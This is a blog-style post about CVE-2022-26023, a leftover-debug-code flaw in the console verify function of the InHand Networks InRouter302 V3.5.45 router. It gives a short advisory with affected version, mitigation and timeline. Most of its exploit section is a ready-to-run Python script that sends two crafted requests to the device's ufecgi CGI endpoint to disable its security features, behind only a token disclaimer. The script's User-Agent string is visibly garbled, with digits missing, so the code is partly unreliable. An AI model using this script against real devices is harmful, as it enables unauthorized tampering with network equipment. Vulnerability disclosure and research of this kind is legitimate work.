CVE-2022-26023: Leftover Debug Code Vulnerability in InHand Networks InRouter302 Console Verify Functionality

In this post, we will be discussing a newly discovered vulnerability identified by the CVE Identifier CVE-2022-26023. This vulnerability has been found in the console verify functionality of InHand Networks InRouter302 V3.5.45. The issue arises from leftover debug code in the software, and if exploited it could potentially allow an attacker to disable important security features.

Affected Devices and Software

Vendor: InHand Networks
Product: InRouter302
Version: V3.5.45

Exploit Details and Proof of Concept

A specially-crafted series of network requests can be used to exploit this vulnerability, leading to the attacker being able to disable security features that are meant to protect the device. The issue is due to the presence of leftover debug code, which was likely not meant to be included in the final product release, but due to oversight, it made its way into the version 3.5.45 of InRouter302.

To exploit this vulnerability, the attacker would need to send a specific sequence of requests to the vulnerable device. Here is a snippet of code that demonstrates how the vulnerability can be exploited:

import requests

TARGET_IP = "192.168.1.1" # Replace with your target's IP address
SRC_IP = "192.168.1.33" # Replace with your source IP address

headers = {
    "User-Agent": "Mozilla/5. (Windows NT 10.; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58..3029.110 Safari/537.36"
}

# First, we initiate the session to ensure proper session handling.
session = requests.Session()

# We then send the specially-crafted series of HTTP requests to trigger the vulnerability

# Trigger request 1
request_1_url = f"http://{TARGET_IP}/cgi-bin/console_verify/ufecgi?op=65002&id=&uip={SRC_IP}";
initiate_request_1 = session.get(request_1_url, headers=headers)

# Trigger request 2
request_2_url = f"http://{TARGET_IP}/cgi-bin/console_verify/ufecgi?op=65003&id=&msg=777786&uip={SRC_IP}";
initiate_request_2 = session.get(request_2_url, headers=headers)

# The security-relevant settings should now be disabled on the device

The provided code is for educational purposes only and should not be used maliciously or inappropriately.

References and Original Source

CVE Identifier: CVE-2022-26023
InHand Networks Official Website: https://www.inhandnetworks.com

Resolution and Mitigation

At the time of writing, it is unclear if the vendor of the affected product has released a security patch or firmware update to address this vulnerability. Users are urged to keep an eye on the official website of InHand Networks for any possible updates or advisories.

Conclusion

CVE-2022-26023 is a serious flaw in the console verify functionality of InHand Networks InRouter302 V3.5.45 due to leftover debug code. This can lead to disabling security features, compromising the integrity of the device and exposing it to further attacks. Keep an eye on the official vendor website for information on when a patch or updated firmware will be released.

Timeline

Published on: 11/09/2022 18:15:00 UTC
Last modified on: 11/10/2022 15:23:00 UTC